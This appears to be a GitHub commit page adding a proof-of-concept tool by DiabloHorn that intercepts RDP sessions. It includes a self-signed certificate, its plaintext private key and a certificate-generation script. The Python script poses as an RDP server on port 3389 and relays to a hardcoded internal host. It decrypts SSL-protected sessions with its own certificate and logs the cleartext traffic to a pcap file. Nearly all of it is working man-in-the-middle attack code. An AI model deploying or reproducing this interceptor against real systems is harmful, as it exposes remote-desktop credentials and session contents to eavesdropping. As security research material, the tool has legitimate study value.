initial commit

DiabloHorn · Apr 21, 2014 · e5430d1 · e5430d1
commit e5430d1
Show file tree

Hide file tree

Showing 4 changed files with 110 additions and 0 deletions.
diff --git a/cert.key b/cert.key
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMv0RTboOJRtedKK
+hdI4bYPafVYrnpuNjlaD83ra5mf8reYmXs/EntMSz5YgbrZhWj2xqKrJ3FElZygV
+XbD/C66pbcJtyqm7zkRbNrjuNkBRfLEjDCaUD66vWr5e/sC8eqHmHQoSw/JJly+x
+yFsLqHwMoDYfe/SF7Q0gTLe2h2jHAgMBAAECgYAirXLDRjKwkfifoqvkNXHxdEnR
+R/Nc0XG9JgxU/DkmvyC2PBnsy6qRiuY+yV7ppZ3ZVYavG0lZhrmGaDOY75SFnPoC
+ypjOaGkLeVvTDNjWrHuDytHeHHnlbtdHTLqetlyoQ2k1NdOngGPUPgJKIXbvq4t/
+MH0vgAIwDR5vTOWaAQJBAPu136jiO+zhOPJOc4BjMVWD9iCBZjbnTvI7+xSXq78o
+hjlbRpxYUp3lWKr6rE+X0jIxSwa5TzLLa+hY8hwVGccCQQDPbg1w5qjqZH1IcCdF
+h853OR7Y930/rotrIeJUE5tpRHJ4Iq1E0pAdwNm34BTiCiii1QtOgtL4QM3fg46S
+ozkBAkAYaWcrpeVR7/Xp6hnhlb0vIgE43dPf90b8zzxmnt8VRwTdgzCx8Q7yKVAU
+JQOZJIxKOeWg3VAFCR2KBzZT6uf5AkBjbyYSUP/4HGPSLbElq4xVqpQW/cyUkl9S
+49NS6nM9awpUfIsCys069g9oDYr1MFl6dRYOdLgdOTN3SeE2efgBAkBTbgblndDK
+151g2ctz+6GUGNt8zv2VHtPna0dCFH8lSTLESHZ3UC3HgOLFIMG7qKTDCrPoYnLq
+vPt+tivx2/Ao
+-----END PRIVATE KEY-----
diff --git a/cert.pem b/cert.pem
@@ -0,0 +1,16 @@
+-----BEGIN CERTIFICATE-----
+MIICfjCCAeegAwIBAgIJAJLBLAkzV96EMA0GCSqGSIb3DQEBBQUAMFgxCzAJBgNV
+BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
+aWRnaXRzIFB0eSBMdGQxETAPBgNVBAMMCE1JVE0tUE9DMB4XDTE0MDQyMDE4NTUz
+MloXDTE1MDQyMDE4NTUzMlowWDELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUt
+U3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDERMA8GA1UE
+AwwITUlUTS1QT0MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMv0RTboOJRt
+edKKhdI4bYPafVYrnpuNjlaD83ra5mf8reYmXs/EntMSz5YgbrZhWj2xqKrJ3FEl
+ZygVXbD/C66pbcJtyqm7zkRbNrjuNkBRfLEjDCaUD66vWr5e/sC8eqHmHQoSw/JJ
+ly+xyFsLqHwMoDYfe/SF7Q0gTLe2h2jHAgMBAAGjUDBOMB0GA1UdDgQWBBSb3fDY
+rSIEImpAqbKWCZQA8ySnizAfBgNVHSMEGDAWgBSb3fDYrSIEImpAqbKWCZQA8ySn
+izAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBADuewBJdn+SQqmNIflhS
+qJg8Ugz4Xe8OresStFboz7qAXkHZOYlHqC79bI4OWHMnW+Dpi4PybypykIxxgQ/r
+7MAAgBhzYOr2N4orEB8DcYR4GRgJhNfksQcCdlSzueXo4qcqgX+mgZTV3NFWjM9l
+K4jEPaTigufYPTO3eMqzzRL2
+-----END CERTIFICATE-----
diff --git a/gencert.sh b/gencert.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key
diff --git a/rdps2rdp_pcap.py b/rdps2rdp_pcap.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python
+#DiabloHorn http://diablohorn.wordpress.com
+#Inspired by: https://labs.portcullis.co.uk/blog/ssl-man-in-the-middle-attacks-on-rdp/
+#Resources:
+#   http://stackoverflow.com/questions/7574092/python-scapy-wrpcap-how-do-you-append-packets-to-a-pcap-file
+#   http://efod.se/media/thesis.pdf
+
+import logging
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+
+import sys
+from scapy.all import *
+from socket import *
+import ssl
+import thread
+import binascii
+
+BUFF = 1024
+OUTPUTPCAP = "output.pcap"
+LISTENCON = ('0.0.0.0', 3389)
+REMOTECON = ('10.50.0.125', 3389)
+
+def savepcap(src,dst,data):
+    pktdump = PcapWriter(OUTPUTPCAP, append=True, sync=True)
+    pktinfo = Ether()/IP(src=src[0],dst=dst[0])/TCP(sport=src[1],dport=dst[1])/data
+    pktdump.write(pktinfo)
+    pktdump.close()
+
+def handler(clientsock,addr):
+    serversock = socket(AF_INET, SOCK_STREAM)
+    serversock.connect(REMOTECON)
+
+    #read client rdp data
+    serversock.sendall(clientsock.recv(19))
+    #read server rdp data and check if ssl
+    temp = serversock.recv(19)
+    clientsock.sendall(temp)
+    if(temp[15] == '\x01'):
+        print('Intercepting rdp session from %s' % clientsock.getpeername()[0])
+        sslserversock = ssl.wrap_socket(serversock,ssl_version=ssl.PROTOCOL_TLSv1)
+        sslserversock.do_handshake() #just in case
+        sslclientsock = ssl.wrap_socket(clientsock, server_side=True,certfile='cert.pem',keyfile='cert.key',ssl_version=ssl.PROTOCOL_TLSv1)
+        sslclientsock.do_handshake() #just in case
+        thread.start_new_thread(trafficloop,(sslclientsock,sslserversock,True))
+        thread.start_new_thread(trafficloop,(sslserversock,sslclientsock,True))
+    else:
+        print('Passing through %s' % clientsock.getpeername()[0])
+        thread.start_new_thread(trafficloop,(clientsock,serversock,False))
+        thread.start_new_thread(trafficloop,(serversock,clientsock,False))
+
+def trafficloop(source,destination,dopcap):
+    string = ' '
+    try:
+        while string:
+            string = source.recv(BUFF)
+            if string:
+                if dopcap:
+                    savepcap(source.getpeername(),destination.getpeername(),string)
+                destination.sendall(string)
+            else:
+                source.shutdown(socket.SHUT_RD)
+                destination.shutdown(socket.SHUT_WR) 
+    except:
+        print('some error happend')
+        pass #being highly lazy
+
+if __name__ == '__main__':
+    serversock = socket(AF_INET, SOCK_STREAM)
+    serversock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
+    serversock.bind(LISTENCON)
+    serversock.listen(5)
+    while 1:
+        print('waiting for connection...')
+        clientsock, addr = serversock.accept()
+        print('...connected from:', addr)
+        thread.start_new_thread(handler,(clientsock,addr))
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@
		#!/bin/bash
		openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key